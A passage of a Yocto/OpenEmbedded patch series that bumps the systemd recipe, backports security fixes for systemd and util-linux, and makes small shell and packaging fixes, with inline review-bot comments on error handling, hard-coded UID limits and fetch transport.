+
+- if (de->d_type == DT_UNKNOWN ||
+- (de->d_type == DT_DIR && (root_dev || (flags & REMOVE_SUBVOLUME)))) {
+- if (fstatat(fd, de->d_name, &st, AT_SYMLINK_NOFOLLOW) < 0) {
+- if (ret == 0 && errno != ENOENT)
+- ret = -errno;
+- continue;
+- }
+-
+- is_dir = S_ISDIR(st.st_mode);
+- } else
+- is_dir = de->d_type == DT_DIR;
+-
+- if (is_dir) {
+- _cleanup_close_ int subdir_fd = -1;
+-
+- /* if root_dev is set, remove subdirectories only if device is same */
+- if (root_dev && st.st_dev != root_dev->st_dev)
+- continue;
+-
+- subdir_fd = openat(fd, de->d_name, O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC|O_NOFOLLOW|O_NOATIME);
+- if (subdir_fd < 0) {
+- if (ret == 0 && errno != ENOENT)
+- ret = -errno;
+- continue;
+- }
+-
+- /* Stop at mount points */
+- r = fd_is_mount_point(fd, de->d_name, 0);
+- if (r < 0) {
+- if (ret == 0 && r != -ENOENT)
+- ret = r;
+-
+- continue;
+- }
+- if (r > 0)
+- continue;
+-
+- if ((flags & REMOVE_SUBVOLUME) && st.st_ino == 256) {
+-
+- /* This could be a subvolume, try to remove it */
+-
+- r = btrfs_subvol_remove_fd(fd, de->d_name, BTRFS_REMOVE_RECURSIVE|BTRFS_REMOVE_QUOTA);
+- if (r < 0) {
+- if (!IN_SET(r, -ENOTTY, -EINVAL)) {
+- if (ret == 0)
+- ret = r;
+-
+- continue;
+- }
+-
+- /* ENOTTY, then it wasn't a btrfs subvolume, continue below. */
+- } else
+- /* It was a subvolume, continue. */
+- continue;
+- }
+-
+- /* We pass REMOVE_PHYSICAL here, to avoid doing the fstatfs() to check the file
+- * system type again for each directory */
+- r = rm_rf_children(TAKE_FD(subdir_fd), flags | REMOVE_PHYSICAL, root_dev);
+- if (r < 0 && ret == 0)
+- ret = r;
+-
+- if (unlinkat(fd, de->d_name, AT_REMOVEDIR) < 0) {
+- if (ret == 0 && errno != ENOENT)
+- ret = -errno;
+- }
+-
+- } else if (!(flags & REMOVE_ONLY_DIRECTORIES)) {
+-
+- if (unlinkat(fd, de->d_name, 0) < 0) {
+- if (ret == 0 && errno != ENOENT)
+- ret = -errno;
+- }
+- }
++ is_dir =
++ de->d_type == DT_UNKNOWN ? -1 :
++ de->d_type == DT_DIR;
++
++ r = rm_rf_children_inner(dirfd(d), de->d_name, is_dir, flags, root_dev);
++ if (r < 0 && r != -ENOENT && ret == 0)
++ ret = r;
+ }
++
+ return ret;
+ }
+
+ int rm_rf(const char *path, RemoveFlags flags) {
+ int fd, r;
+- struct statfs s;
+
+ assert(path);
+
+@@ -195,9 +210,10 @@
+ if (FLAGS_SET(flags, REMOVE_ROOT)) {
+
+ if (!FLAGS_SET(flags, REMOVE_PHYSICAL)) {
++ struct statfs s;
++
+ if (statfs(path, &s) < 0)
+ return -errno;
+-
+ if (is_physical_fs(&s))
+ return log_error_errno(SYNTHETIC_ERRNO(EPERM),
+ "Attempted to remove files from a disk file system under \"%s\", refusing.",
+@@ -225,3 +241,22 @@
+
+ return r;
+ }
++
++int rm_rf_child(int fd, const char *name, RemoveFlags flags) {
++
++ /* Removes one specific child of the specified directory */
++
++ if (fd < 0)
++ return -EBADF;
++
++ if (!filename_is_valid(name))
++ return -EINVAL;
++
++ if ((flags & (REMOVE_ROOT|REMOVE_MISSING_OK)) != 0) /* Doesn't really make sense here, we are not supposed to remove 'fd' anyway */
++ return -EINVAL;
++
++ if (FLAGS_SET(flags, REMOVE_ONLY_DIRECTORIES|REMOVE_SUBVOLUME))
++ return -EINVAL;
++
++ return rm_rf_children_inner(fd, name, -1, flags, NULL);
++}
+--- a/src/basic/rm-rf.h
++++ b/src/basic/rm-rf.h
+@@ -13,7 +13,8 @@
+ REMOVE_MISSING_OK = 1 << 4, /* If the top-level directory is missing, ignore the ENOENT for it */
+ } RemoveFlags;
+
+-int rm_rf_children(int fd, RemoveFlags flags, struct stat *root_dev);
++int rm_rf_children(int fd, RemoveFlags flags, const struct stat *root_dev);
++int rm_rf_child(int fd, const char *name, RemoveFlags flags);
+ int rm_rf(const char *path, RemoveFlags flags);
+
+ /* Useful for usage with _cleanup_(), destroys a directory and frees the pointer */
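Review bot: In the added rm_rf_children_inner(), the results of fstatat() and of both unlinkat() calls are returned as `r`, which is -1 with the cause left in errno, not a negative errno value. The loop in rm_rf_children() filters with `r != -ENOENT`, so an entry that vanished mid-walk is no longer ignored and every failure surfaces as -1, which reads as -EPERM; the removed code used `-errno` at these sites. Each check should follow the form `if (fstatat(fd, fname, &st, AT_SYMLINK_NOFOLLOW) < 0) return -errno;`, and the same applies to `unlinkat(fd, fname, AT_REMOVEDIR)` and `unlinkat(fd, fname, 0)`. Separately, the `}` kept as context after the new `if (fstatfs(dirfd(d), &sfs) < 0)` looks like the close of the removed `if (r < 0) {`; indentation is lost in this view, so it is worth confirming that the braces still balance once the patch is applied.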
diff --git a/meta/recipes-core/systemd/systemd/systemd-pager.sh b/meta/recipes-core/systemd/systemd/systemd-pager.sh
new file mode 100644
index 0000000000..86e3e0ab78
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/systemd-pager.sh
@@ -0,0 +1,7 @@
+# Systemd expect a color capable pager, however the less provided
+# by busybox is not. This make many interaction with systemd pretty
+# annoying. As a workaround we disable the systemd pager if less
+# is not the GNU version.
+if ! less -V > /dev/null 2>&1 ; then
+ export SYSTEMD_PAGER=
+fi
diff --git a/meta/recipes-core/systemd/systemd/systemd-udev-seclabel-options-crash-fix.patch b/meta/recipes-core/systemd/systemd/systemd-udev-seclabel-options-crash-fix.patch
deleted file mode 100644
index 27b2b60fad..0000000000
--- a/meta/recipes-core/systemd/systemd/systemd-udev-seclabel-options-crash-fix.patch
+++ /dev/null
@@ -1,30 +0,0 @@
-From 0335d110afc08baf47d76b7011ce02510dfdd524 Mon Sep 17 00:00:00 2001
-From: Valery0xff <valery.chernous@gmail.com>
-Date: Wed, 11 Mar 2020 02:20:36 +0200
-Subject: [PATCH] udev: fix SECLABEL{selinux} issue (#15064)
-
-Add SECLABEL{selinux}="some value" cause udevadm crash
-systemd-udevd[x]: Worker [x] terminated by signal 11 (SEGV)
-
-It happens since 25de7aa7b90 (Yu Watanabe 2019-04-25 01:21:11 +0200)
-when udev rules processing changed to token model. Yu forgot store
-attr to SECLABEL token so fix it.
----
- src/udev/udev-rules.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-Upstream-Status: Backport [https://github.com/systemd/systemd/commit/0335d110afc08baf47d76b7011ce02510dfdd524.patch]
----
-diff --git a/src/udev/udev-rules.c b/src/udev/udev-rules.c
-index b9b350d1ef..b990f68e93 100644
---- a/src/udev/udev-rules.c
-+++ b/src/udev/udev-rules.c
-@@ -921,7 +921,7 @@ static int parse_token(UdevRules *rules, const char *key, char *attr, UdevRuleOp
- op = OP_ASSIGN;
- }
-
-- r = rule_line_add_token(rule_line, TK_A_SECLABEL, op, value, NULL);
-+ r = rule_line_add_token(rule_line, TK_A_SECLABEL, op, value, attr);
- } else if (streq(key, "RUN")) {
- if (is_match || op == OP_REMOVE)
- return log_token_invalid_op(rules, key);
diff --git a/meta/recipes-core/systemd/systemd_244.3.bb b/meta/recipes-core/systemd/systemd_244.5.bb
index 64e3b18333..8b2f47b92f 100644
--- a/meta/recipes-core/systemd/systemd_244.3.bb
+++ b/meta/recipes-core/systemd/systemd_244.5.bb
@@ -18,10 +18,28 @@ SRC_URI += "file://touchscreen.rules \
file://00-create-volatile.conf \
file://init \
file://99-default.preset \
+ file://systemd-pager.sh \
file://0001-binfmt-Don-t-install-dependency-links-at-install-tim.patch \
file://0003-implment-systemd-sysv-install-for-OE.patch \
- file://CVE-2020-13776.patch \
- file://systemd-udev-seclabel-options-crash-fix.patch \
+ file://CVE-2021-33910.patch \
+ file://CVE-2020-13529.patch \
+ file://basic-pass-allocation-info-for-ordered-set-new-and-introd.patch \
+ file://introduce-ordered_set_clear-free-with-destructor.patch \
+ file://network-add-skeleton-of-request-queue.patch \
+ file://network-merge-link_drop-and-link_detach_from_manager.patch \
+ file://network-also-drop-requests-when-link-enters-linger-state.patch \
+ file://network-fix-Link-reference-counter-issue.patch \
+ file://rm-rf-refactor-rm-rf-children-split-out-body-of-directory.patch \
+ file://rm-rf-optionally-fsync-after-removing-directory-tree.patch \
+ file://CVE-2018-21029.patch \
+ file://CVE-2021-3997-1.patch \
+ file://CVE-2021-3997-2.patch \
+ file://CVE-2021-3997-3.patch \
+ file://CVE-2022-3821.patch \
+ file://CVE-2023-26604-1.patch \
+ file://CVE-2023-26604-2.patch \
+ file://CVE-2023-26604-3.patch \
+ file://CVE-2023-26604-4.patch \
"
# patches needed by musl
@@ -51,6 +69,9 @@ SRC_URI_MUSL = "\
file://0004-src-shared-cpu-set-util.h-add-__cpu_mask-definition.patch \
"
+# already applied in 244.5
+CVE_CHECK_WHITELIST += "CVE-2020-13776"
+
PAM_PLUGINS = " \
pam-plugin-unix \
pam-plugin-loginuid \
@@ -87,6 +108,7 @@ PACKAGECONFIG ??= " \
timesyncd \
utmp \
vconsole \
+ wheel-group \
xz \
"
@@ -147,6 +169,7 @@ PACKAGECONFIG[manpages] = "-Dman=true,-Dman=false,libxslt-native xmlto-native do
PACKAGECONFIG[microhttpd] = "-Dmicrohttpd=true,-Dmicrohttpd=false,libmicrohttpd"
PACKAGECONFIG[myhostname] = "-Dnss-myhostname=true,-Dnss-myhostname=false,,libnss-myhostname"
PACKAGECONFIG[networkd] = "-Dnetworkd=true,-Dnetworkd=false"
+PACKAGECONFIG[no-dns-fallback] = "-Ddns-servers="
PACKAGECONFIG[nss] = "-Dnss-systemd=true,-Dnss-systemd=false"
PACKAGECONFIG[nss-mymachines] = "-Dnss-mymachines=true,-Dnss-mymachines=false"
PACKAGECONFIG[nss-resolve] = "-Dnss-resolve=true,-Dnss-resolve=false"
@@ -179,6 +202,7 @@ PACKAGECONFIG[sbinmerge] = "-Dsplit-bin=false,-Dsplit-bin=true"
PACKAGECONFIG[utmp] = "-Dutmp=true,-Dutmp=false"
PACKAGECONFIG[valgrind] = "-DVALGRIND=1,,valgrind"
PACKAGECONFIG[vconsole] = "-Dvconsole=true,-Dvconsole=false,,${PN}-vconsole-setup"
+PACKAGECONFIG[wheel-group] = "-Dwheel-group=true, -Dwheel-group=false"
# Verify keymaps on locale change
PACKAGECONFIG[xkbcommon] = "-Dxkbcommon=true,-Dxkbcommon=false,libxkbcommon"
PACKAGECONFIG[xz] = "-Dxz=true,-Dxz=false,xz"
@@ -196,10 +220,12 @@ rootlibexecdir = "${rootprefix}/lib"
EXTRA_OEMESON += "-Dlink-udev-shared=false"
EXTRA_OEMESON += "-Dnobody-user=nobody \
- -Dnobody-group=nobody \
+ -Dnobody-group=nogroup \
-Drootlibdir=${rootlibdir} \
-Drootprefix=${rootprefix} \
-Ddefault-locale=C \
+ -Dsystem-uid-max=999 \
+ -Dsystem-gid-max=999 \
"
# Hardcode target binary paths to avoid using paths from sysroot
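Review bot: The added `-Dsystem-uid-max=999` and `-Dsystem-gid-max=999` are hard-coded with no comment on what they have to agree with. systemd uses these limits to separate system accounts from regular users, so an image whose login.defs carries a different SYS_UID_MAX or SYS_GID_MAX would classify accounts inconsistently; presumably 999 was chosen to match the shadow defaults, but the recipe does not say so. A line such as `# keep in sync with SYS_UID_MAX/SYS_GID_MAX in login.defs` above the EXTRA_OEMESON assignment would record the dependency.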
@@ -297,6 +323,9 @@ do_install() {
# install default policy for presets
# https://www.freedesktop.org/wiki/Software/systemd/Preset/#howto
install -Dm 0644 ${WORKDIR}/99-default.preset ${D}${systemd_unitdir}/system-preset/99-default.preset
+
+ # add a profile fragment to disable systemd pager with busybox less
+ install -Dm 0644 ${WORKDIR}/systemd-pager.sh ${D}${sysconfdir}/profile.d/systemd-pager.sh
}
python populate_packages_prepend (){
@@ -384,9 +413,9 @@ FILES_${PN}-binfmt = "${sysconfdir}/binfmt.d/ \
${rootlibexecdir}/systemd/systemd-binfmt \
${systemd_unitdir}/system/proc-sys-fs-binfmt_misc.* \
${systemd_unitdir}/system/systemd-binfmt.service"
-RRECOMMENDS_${PN}-binfmt = "kernel-module-binfmt-misc"
+RRECOMMENDS_${PN}-binfmt = "${@bb.utils.contains('PACKAGECONFIG', 'binfmt', 'kernel-module-binfmt-misc', '', d)}"
-RRECOMMENDS_${PN}-vconsole-setup = "kbd kbd-consolefonts kbd-keymaps"
+RRECOMMENDS_${PN}-vconsole-setup = "${@bb.utils.contains('PACKAGECONFIG', 'vconsole', 'kbd kbd-consolefonts kbd-keymaps', '', d)}"
FILES_${PN}-journal-gatewayd = "${rootlibexecdir}/systemd/systemd-journal-gatewayd \
@@ -519,6 +548,7 @@ FILES_${PN} = " ${base_bindir}/* \
${sysconfdir}/dbus-1/ \
${sysconfdir}/modules-load.d/ \
${sysconfdir}/pam.d/ \
+ ${sysconfdir}/profile.d/ \
${sysconfdir}/sysctl.d/ \
${sysconfdir}/systemd/ \
${sysconfdir}/tmpfiles.d/ \
diff --git a/meta/recipes-core/sysvinit/sysvinit/rc b/meta/recipes-core/sysvinit/sysvinit/rc
index fd1fdd26ba..d0d3149821 100755
--- a/meta/recipes-core/sysvinit/sysvinit/rc
+++ b/meta/recipes-core/sysvinit/sysvinit/rc
@@ -63,7 +63,7 @@ startup() {
stty onlcr 0>&1
# Limit stack size for startup scripts
- [ "$STACK_SIZE" == "" ] || ulimit -S -s $STACK_SIZE
+ [ "$STACK_SIZE" = "" ] || ulimit -S -s $STACK_SIZE
# Now find out what the current and what the previous runlevel are.
diff --git a/meta/recipes-core/udev/eudev/init b/meta/recipes-core/udev/eudev/init
index 0455ade258..c60dbbf6d5 100644
--- a/meta/recipes-core/udev/eudev/init
+++ b/meta/recipes-core/udev/eudev/init
@@ -52,7 +52,7 @@ case "$1" in
kill_udevd > "/dev/null" 2>&1
# trigger the sorted events
- [ -e /proc/sys/kernel/hotplug ] && echo -e '\000' >/proc/sys/kernel/hotplug
+ [ -e /proc/sys/kernel/hotplug ] && printf '\0\n' >/proc/sys/kernel/hotplug
@UDEVD@ -d
udevadm control --env=STARTUP=1
diff --git a/meta/recipes-core/udev/eudev_3.2.9.bb b/meta/recipes-core/udev/eudev_3.2.9.bb
index f96f8cbe78..3ae91dee51 100644
--- a/meta/recipes-core/udev/eudev_3.2.9.bb
+++ b/meta/recipes-core/udev/eudev_3.2.9.bb
@@ -1,5 +1,6 @@
SUMMARY = "eudev is a fork of systemd's udev"
HOMEPAGE = "https://wiki.gentoo.org/wiki/Eudev"
+DESCRIPTION = "eudev is Gentoo's fork of udev, systemd's device file manager for the Linux kernel. It manages device nodes in /dev and handles all user space actions when adding or removing devices."
LICENSE = "GPLv2.0+ & LGPL-2.1+"
LICENSE_libudev = "LGPL-2.1+"
LIC_FILES_CHKSUM = "file://COPYING;md5=751419260aa954499f7abaabaa882bbe"
diff --git a/meta/recipes-core/update-rc.d/update-rc.d_0.8.bb b/meta/recipes-core/update-rc.d/update-rc.d_0.8.bb
index 75632d9434..daee5c224b 100644
--- a/meta/recipes-core/update-rc.d/update-rc.d_0.8.bb
+++ b/meta/recipes-core/update-rc.d/update-rc.d_0.8.bb
@@ -6,8 +6,8 @@ SECTION = "base"
LICENSE = "GPLv2+"
LIC_FILES_CHKSUM = "file://update-rc.d;beginline=5;endline=15;md5=d40a07c27f535425934bb5001f2037d9"
-SRC_URI = "git://git.yoctoproject.org/update-rc.d"
-SRCREV = "4b150b25b38de688d25cde2b2d22c268ed65a748"
+SRC_URI = "git://git.yoctoproject.org/update-rc.d;branch=master"
+SRCREV = "8636cf478d426b568c1be11dbd9346f67e03adac"
UPSTREAM_CHECK_COMMITS = "1"
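Review bot: The updated SRC_URI still fetches over the unauthenticated git transport, because a `git://` URL without a `protocol=` parameter uses the fetcher's default. The SRCREV pin limits what a tampered transfer could deliver, but an encrypted transport is the safer default where the server offers it: `SRC_URI = "git://git.yoctoproject.org/update-rc.d;branch=master;protocol=https"`.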
diff --git a/meta/recipes-core/util-linux/util-linux.inc b/meta/recipes-core/util-linux/util-linux.inc
index 0e85603d9a..7b780352be 100644
--- a/meta/recipes-core/util-linux/util-linux.inc
+++ b/meta/recipes-core/util-linux/util-linux.inc
@@ -59,12 +59,13 @@ python util_linux_binpackages () {
continue
pkg = os.path.basename(os.readlink(file))
- extras[pkg] = extras.get(pkg, '') + ' ' + file.replace(dvar, '', 1)
+ extras.setdefault(pkg, [])
+ extras[pkg].append(file.replace(dvar, '', 1))
pn = d.getVar('PN')
for pkg, links in extras.items():
of = d.getVar('FILES_' + pn + '-' + pkg)
- links = of + links
+ links = of + " " + " ".join(sorted(links))
d.setVar('FILES_' + pn + '-' + pkg, links)
}
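Review bot: `d.getVar('FILES_' + pn + '-' + pkg)` returns None when the variable is unset, and the new `of + " " + " ".join(sorted(links))` would then raise TypeError. Whether every symlink target already has a FILES entry is not visible here, since util_linux_binpackages starts above this hunk; `links = (of or "") + " " + " ".join(sorted(links))` is safe either way. The two lines added in the loop can also be folded into `extras.setdefault(pkg, []).append(file.replace(dvar, '', 1))`.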
@@ -94,7 +95,7 @@ EXTRA_OECONF = "\
\
--disable-bfs --disable-chfn-chsh --disable-login \
--disable-makeinstall-chown --disable-minix --disable-newgrp \
- --disable-use-tty-group --disable-vipw \
+ --disable-use-tty-group --disable-vipw --disable-raw \
\
--without-udev \
\
diff --git a/meta/recipes-core/util-linux/util-linux/CVE-2021-37600.patch b/meta/recipes-core/util-linux/util-linux/CVE-2021-37600.patch
new file mode 100644
index 0000000000..2b306c435b
--- /dev/null
+++ b/meta/recipes-core/util-linux/util-linux/CVE-2021-37600.patch
@@ -0,0 +1,33 @@
+From 1c9143d0c1f979c3daf10e1c37b5b1e916c22a1c Mon Sep 17 00:00:00 2001
+From: Karel Zak <kzak@redhat.com>
+Date: Tue, 27 Jul 2021 11:58:31 +0200
+Subject: [PATCH] sys-utils/ipcutils: be careful when call calloc() for uint64
+ nmembs
+
+Fix: https://github.com/karelzak/util-linux/issues/1395
+Signed-off-by: Karel Zak <kzak@redhat.com>
+
+CVE: CVE-2021-37600
+Upstream-Status: Backport [1c9143d0c1f979c3daf10e1c37b5b1e916c22a1c]
+
+Signed-off-by: Dragos-Marian Panait <dragos.panait@windriver.com>
+---
+ sys-utils/ipcutils.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/sys-utils/ipcutils.c b/sys-utils/ipcutils.c
+index e784c4dcb..18868cfd3 100644
+--- a/sys-utils/ipcutils.c
++++ b/sys-utils/ipcutils.c
+@@ -218,7 +218,7 @@ static void get_sem_elements(struct sem_data *p)
+ {
+ size_t i;
+
+- if (!p || !p->sem_nsems || p->sem_perm.id < 0)
++ if (!p || !p->sem_nsems || p->sem_nsems > SIZE_MAX || p->sem_perm.id < 0)
+ return;
+
+ p->elements = xcalloc(p->sem_nsems, sizeof(struct sem_elem));
+--
+2.25.1
+
diff --git a/meta/recipes-core/util-linux/util-linux/CVE-2021-3995.patch b/meta/recipes-core/util-linux/util-linux/CVE-2021-3995.patch
new file mode 100644
index 0000000000..1dcb66ad1d
--- /dev/null
+++ b/meta/recipes-core/util-linux/util-linux/CVE-2021-3995.patch
@@ -0,0 +1,139 @@
+From f3db9bd609494099f0c1b95231c5dfe383346929 Mon Sep 17 00:00:00 2001
+From: Karel Zak <kzak@redhat.com>
+Date: Wed, 24 Nov 2021 13:53:25 +0100
+Subject: [PATCH] libmount: fix UID check for FUSE umount [CVE-2021-3995]
+
+Improper UID check allows an unprivileged user to unmount FUSE
+filesystems of users with similar UID.
+
+Signed-off-by: Karel Zak <kzak@redhat.com>
+
+CVE: CVE-2021-3995
+Upstream-Status: Backport [https://github.com/util-linux/util-linux/commit/f3db9bd609494099f0c1b95231c5dfe383346929]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ include/strutils.h | 2 +-
+ libmount/src/context_umount.c | 14 +++---------
+ libmount/src/mountP.h | 1 +
+ libmount/src/optstr.c | 42 +++++++++++++++++++++++++++++++++++
+ 4 files changed, 47 insertions(+), 12 deletions(-)
+
+diff --git a/include/strutils.h b/include/strutils.h
+index 6e95707ea9..a84d29594d 100644
+--- a/include/strutils.h
++++ b/include/strutils.h
+@@ -91,8 +91,8 @@ static inline char *mem2strcpy(char *dest, const void *src, size_t n, size_t nma
+ if (n + 1 > nmax)
+ n = nmax - 1;
+
++ memset(dest, '\0', nmax);
+ memcpy(dest, src, n);
+- dest[nmax-1] = '\0';
+ return dest;
+ }
+
+diff --git a/libmount/src/context_umount.c b/libmount/src/context_umount.c
+index 173637a15a..8773c65ffa 100644
+--- a/libmount/src/context_umount.c
++++ b/libmount/src/context_umount.c
+@@ -393,10 +393,7 @@ static int is_fuse_usermount(struct libmnt_context *cxt, int *errsv)
+ struct libmnt_ns *ns_old;
+ const char *type = mnt_fs_get_fstype(cxt->fs);
+ const char *optstr;
+- char *user_id = NULL;
+- size_t sz;
+- uid_t uid;
+- char uidstr[sizeof(stringify_value(ULONG_MAX))];
++ uid_t uid, entry_uid;
+
+ *errsv = 0;
+
+@@ -413,11 +410,7 @@ static int is_fuse_usermount(struct libmnt_context *cxt, int *errsv)
+ optstr = mnt_fs_get_fs_options(cxt->fs);
+ if (!optstr)
+ return 0;
+-
+- if (mnt_optstr_get_option(optstr, "user_id", &user_id, &sz) != 0)
+- return 0;
+-
+- if (sz == 0 || user_id == NULL)
++ if (mnt_optstr_get_uid(optstr, "user_id", &entry_uid) != 0)
+ return 0;
+
+ /* get current user */
+@@ -434,8 +427,7 @@ static int is_fuse_usermount(struct libmnt_context *cxt, int *errsv)
+ return 0;
+ }
+
+- snprintf(uidstr, sizeof(uidstr), "%lu", (unsigned long) uid);
+- return strncmp(user_id, uidstr, sz) == 0;
++ return uid == entry_uid;
+ }
+
+ /*
+diff --git a/libmount/src/mountP.h b/libmount/src/mountP.h
+index d43a835418..22442ec55e 100644
+--- a/libmount/src/mountP.h
++++ b/libmount/src/mountP.h
+@@ -400,6 +400,7 @@ extern const struct libmnt_optmap *mnt_optmap_get_entry(
+ const struct libmnt_optmap **mapent);
+
+ /* optstr.c */
++extern int mnt_optstr_get_uid(const char *optstr, const char *name, uid_t *uid);
+ extern int mnt_optstr_remove_option_at(char **optstr, char *begin, char *end);
+ extern int mnt_optstr_fix_gid(char **optstr, char *value, size_t valsz, char **next);
+ extern int mnt_optstr_fix_uid(char **optstr, char *value, size_t valsz, char **next);
+diff --git a/libmount/src/optstr.c b/libmount/src/optstr.c
+index 921b9318e7..16800f571c 100644
+--- a/libmount/src/optstr.c
++++ b/libmount/src/optstr.c
+@@ -1090,6 +1090,48 @@ int mnt_optstr_fix_user(char **optstr)
+ return rc;
+ }
+
++/*
++ * Converts value from @optstr addressed by @name to uid.
++ *
++ * Returns: 0 on success, 1 if not found, <0 on error
++ */
++int mnt_optstr_get_uid(const char *optstr, const char *name, uid_t *uid)
++{
++ char *value = NULL;
++ size_t valsz = 0;
++ char buf[sizeof(stringify_value(UINT64_MAX))];
++ int rc;
++ uint64_t num;
++
++ assert(optstr);
++ assert(name);
++ assert(uid);
++
++ rc = mnt_optstr_get_option(optstr, name, &value, &valsz);
++ if (rc != 0)
++ goto fail;
++
++ if (valsz > sizeof(buf) - 1) {
++ rc = -ERANGE;
++ goto fail;
++ }
++ mem2strcpy(buf, value, valsz, sizeof(buf));
++
++ rc = ul_strtou64(buf, &num, 10);
++ if (rc != 0)
++ goto fail;
++ if (num > ULONG_MAX || (uid_t) num != num) {
++ rc = -ERANGE;
++ goto fail;
++ }
++ *uid = (uid_t) num;
++
++ return 0;
++fail:
++ DBG(UTILS, ul_debug("failed to convert '%s'= to number [rc=%d]", name, rc));
++ return rc;
++}
++
+ /**
+ * mnt_match_options:
+ * @optstr: options string
diff --git a/meta/recipes-core/util-linux/util-linux/CVE-2021-3996.patch b/meta/recipes-core/util-linux/util-linux/CVE-2021-3996.patch
new file mode 100644
index 0000000000..1610b5a0fe
--- /dev/null
+++ b/meta/recipes-core/util-linux/util-linux/CVE-2021-3996.patch
@@ -0,0 +1,226 @@
+From 018a10907fa9885093f6d87401556932c2d8bd2b Mon Sep 17 00:00:00 2001
+From: Karel Zak <kzak@redhat.com>
+Date: Tue, 4 Jan 2022 10:54:20 +0100
+Subject: [PATCH] libmount: fix (deleted) suffix issue [CVE-2021-3996]
+
+This issue is related to parsing the /proc/self/mountinfo file allows an
+unprivileged user to unmount other user's filesystems that are either
+world-writable themselves or mounted in a world-writable directory.
+
+The support for "(deleted)" is no more necessary as the Linux kernel does
+not use it in /proc/self/mountinfo and /proc/self/mount files anymore.
+
+Signed-off-by: Karel Zak <kzak@redhat.com>
+
+CVE: CVE-2021-3996
+Upstream-Status: Backport [https://github.com/util-linux/util-linux/commit/018a10907fa9885093f6d87401556932c2d8bd2b]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ libmount/src/tab_parse.c | 5 -----
+ tests/expected/findmnt/filter-options | 1 -
+ tests/expected/findmnt/filter-options-nameval-neg | 3 +--
+ tests/expected/findmnt/filter-types-neg | 1 -
+ tests/expected/findmnt/outputs-default | 3 +--
+ tests/expected/findmnt/outputs-force-tree | 3 +--
+ tests/expected/findmnt/outputs-kernel | 3 +--
+ tests/expected/libmount/tabdiff-mount | 1 -
+ tests/expected/libmount/tabdiff-move | 1 -
+ tests/expected/libmount/tabdiff-remount | 1 -
+ tests/expected/libmount/tabdiff-umount | 1 -
+ tests/expected/libmount/tabfiles-parse-mountinfo | 11 -----------
+ tests/expected/libmount/tabfiles-py-parse-mountinfo | 11 -----------
+ tests/ts/findmnt/files/mountinfo | 1 -
+ tests/ts/findmnt/files/mountinfo-nonroot | 1 -
+ tests/ts/libmount/files/mountinfo | 1 -
+ 16 files changed, 4 insertions(+), 44 deletions(-)
+
+diff --git a/libmount/src/tab_parse.c b/libmount/src/tab_parse.c
+index 917779ab6d..4407f9c9c7 100644
+--- a/libmount/src/tab_parse.c
++++ b/libmount/src/tab_parse.c
+@@ -225,11 +225,6 @@ static int mnt_parse_mountinfo_line(struct libmnt_fs *fs, const char *s)
+ goto fail;
+ }
+
+- /* remove "\040(deleted)" suffix */
+- p = (char *) endswith(fs->target, PATH_DELETED_SUFFIX);
+- if (p && *p)
+- *p = '\0';
+-
+ s = skip_separator(s);
+
+ /* (6) vfs options (fs-independent) */
+diff --git a/tests/expected/findmnt/filter-options b/tests/expected/findmnt/filter-options
+index 2606bce76b..97b0ead0ad 100644
+--- a/tests/expected/findmnt/filter-options
++++ b/tests/expected/findmnt/filter-options
+@@ -28,5 +28,4 @@ TARGET SOURCE FSTYPE OPTIONS
+ /home/kzak/.gvfs gvfs-fuse-daemon fuse.gvfs-fuse-daemon rw,nosuid,nodev,relatime,user_id=500,group_id=500
+ /var/lib/nfs/rpc_pipefs sunrpc rpc_pipefs rw,relatime
+ /mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+-/mnt/foo /fooooo bar rw,relatime
+ rc=0
+diff --git a/tests/expected/findmnt/filter-options-nameval-neg b/tests/expected/findmnt/filter-options-nameval-neg
+index 5471d65af1..f0467ef755 100644
+--- a/tests/expected/findmnt/filter-options-nameval-neg
++++ b/tests/expected/findmnt/filter-options-nameval-neg
+@@ -29,6 +29,5 @@ TARGET SOURCE FSTYPE OPTIO
+ |-/home/kzak /dev/mapper/kzak-home ext4 rw,noatime,barrier=1,data=ordered
+ | `-/home/kzak/.gvfs gvfs-fuse-daemon fuse.gvfs-fuse-daemon rw,nosuid,nodev,relatime,user_id=500,group_id=500
+ |-/var/lib/nfs/rpc_pipefs sunrpc rpc_pipefs rw,relatime
+-|-/mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+-`-/mnt/foo /fooooo bar rw,relatime
++`-/mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+ rc=0
+diff --git a/tests/expected/findmnt/filter-types-neg b/tests/expected/findmnt/filter-types-neg
+index 2606bce76b..97b0ead0ad 100644
+--- a/tests/expected/findmnt/filter-types-neg
++++ b/tests/expected/findmnt/filter-types-neg
+@@ -28,5 +28,4 @@ TARGET SOURCE FSTYPE OPTIONS
+ /home/kzak/.gvfs gvfs-fuse-daemon fuse.gvfs-fuse-daemon rw,nosuid,nodev,relatime,user_id=500,group_id=500
+ /var/lib/nfs/rpc_pipefs sunrpc rpc_pipefs rw,relatime
+ /mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+-/mnt/foo /fooooo bar rw,relatime
+ rc=0
+diff --git a/tests/expected/findmnt/outputs-default b/tests/expected/findmnt/outputs-default
+index 59495797bd..01599355ec 100644
+--- a/tests/expected/findmnt/outputs-default
++++ b/tests/expected/findmnt/outputs-default
+@@ -30,6 +30,5 @@ TARGET SOURCE FSTYPE OPTIO
+ |-/home/kzak /dev/mapper/kzak-home ext4 rw,noatime,barrier=1,data=ordered
